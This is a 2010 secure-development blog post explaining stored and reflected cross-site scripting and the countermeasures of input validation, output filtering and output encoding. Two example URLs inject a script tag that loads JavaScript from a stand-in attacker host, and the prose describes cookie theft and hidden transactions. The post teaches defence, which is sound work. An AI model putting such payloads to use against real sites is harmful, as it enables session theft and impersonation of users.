Secure Development - Cross-Site Scripting (XSS)

Feb 19 2010

Originally, this week's post was supposed to cover both Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), but I quickly realized that each of these topics alone are more than enough to fill a blog entry. These two are some of the most common and dangerous web application attacks, and at first glance, it may be hard to tell the difference. Here is an easy way to distinguish them: XSS involves injecting content into an existing page, while CSRF involves taking unauthorized actions on behalf of a logged-on user. XSS can be used (and often is) to launch CSRF attacks, but they are two separate attack modes.

There are two categories of XSS attacks, 1) stored (persistent) and 2) reflected. Persistent XSS attacks are farther-reaching since the malicious code only needs to be injected once and then gets stored, usually in a back-end database. From there, it can potentially reach thousands of users who visit the site. A reflected XSS attack is no less powerful (it produces the same end result  in the victim's browser), but it is typically only possible to attack one user at a time. Often, this is done by e-mailing or instant messaging the victim with a special link (usually to a legitimate site) that has the malicious code embedded. For example, the following Google link is an example of a reflected XSS attack. This attack would inject malicious code when the user views the results page (don't worry, this doesn't actually work--Google properly escapes the special characters; see Output Encoding below):

http://www.google.com/search?q=test<script src="http://mal.icio.us/payload.js"></script>

Next, let's look at an example of a persistent XSS attack, where the attacker posts a normal-looking comment ("cool") followed by some JavaScript pointing to code hosted on a web server that is controlled by the attacker.

http://forum.com/postComment?comment=cool<script src="http://mal.icio.us/payload.js"></script>

Assuming this is posted to a message board or forum, the injected JavaScript will execute each time a user later loads the page. Keep in mind that JavaScript executes inside the user's browser, though it is limited by the same-origin policy. This policy states that JavaScript originating from web site A cannot access any cookies or other data stored by web site B. However, an XSS attack overcomes this limitation since the injected code seems to originate from the legitimate website (forum.com), leaving it free to steal the user's forum.com session cookies, which would allow an attacker or automated script to impersonate the user.

Any other features supported by JavaScript (including the ability to partially read the user's browsing history) are fully available to the injected code. From this vantage point, the attacker can launch any number of insidious attacks, including exploiting bugs in the browser or any of the add-on technologies (i.e. JavaScript, ActiveX, Flash, PDF) to break out of the browser sandbox and gain full user-level access to the user's PC (or worse if the user is logged in on a privileged account, as is the case with many Windows XP users).

However, in some cases attackers don't even need to break out of the JavaScript sandbox to achieve their goals. Entire botnets have been implemented running only on JavaScript inside the victims' browsers. For most bots, the two most important resources are CPU time and network connectivity, both of which are freely available to any JavaScript code. For a good proof-of-concept example, see XSS-Proxy and also check out the story of Jikto, a security researcher's proof-of-concept JavaScript bot implementation that was accidentally leaked at ShmooCon 2007.

The attacker can even alter the HTML content of the web pages being displayed. The implications of this are significant, especially in the context of financial websites. For example, attackers can initiate transactions on behalf of the user (via CSRF, more on this next week) and then hide these transactions by altering the HTML returned by the web server when the users checks their transaction history. In September 2009, the URLzone banking Trojan was observed covering its tracks in this way, though it used browser hooking instead of XSS.

While XSS vulnerabilities can lead to some very complex and dangerous attacks, developers can prevent most of them with just three countermeasures (where possible, use all three combined):

  1. Input Validation: I hate to keep harping on this, but as I mentioned in my first post, poor input validation is at the root of a large number of security-related code problems. Whitelist-only input validation works well in most cases where the input is well-formed.
  2. Output Filtering: In cases where the input can legitimately contain special characters related to HTML and JavaScript, you may still be able to safely strip out unexpected characters when you are outputting the result. As with input validation, using a default-deny whitelisting approach works best, with Regular Expressions to simplify string matching.
  3. Output Encoding: There are some cases where both the input and output can legitimately contain pretty much any type of character (such as Google searches). In these cases, neither input nor output filtering are feasible, so the best approach is escaping or encoding all special characters in the output. Specifically, all HTML special characters should be translated to their HTML entities: < becomes &lt; , ) becomes &#41; , and so on. In Java, you can use HTMLEncode or JSTL c:out for output encoding.

In fact, these are pretty much the only types of countermeasures that developers have available, mainly because once an attacker has injected malicious code into a site, the majority of the actions he can take are actually available by design: trusted JavaScript is supposed to be able to read cookies, initiate network connections on behalf of the user (i.e. AJAX), etc. In other words, your defenses should be focused on keeping malicious JavaScript out of your web server, because once it gets in, it's basically Game Over.

Next week, we'll talk about XSS's evil twin, Cross-Site Request Forgery (CSRF).

About the Author

Daniel is a business and technical systems analyst with a background in IT security and software development. He has four years of experience in the IT security field, including published academic research. His main areas of expertise include secure development, network security, and authentication. In addition to security, Daniel has a software development background in languages such as Java, PHP, SQL, and Perl. He also has over 12 years experience working with and administering various versions of Linux and related open-source software.

Disclaimer

The words and opinions expressed here are those of each article's respective author, and do not necessarily represent the views of CapTech Ventures.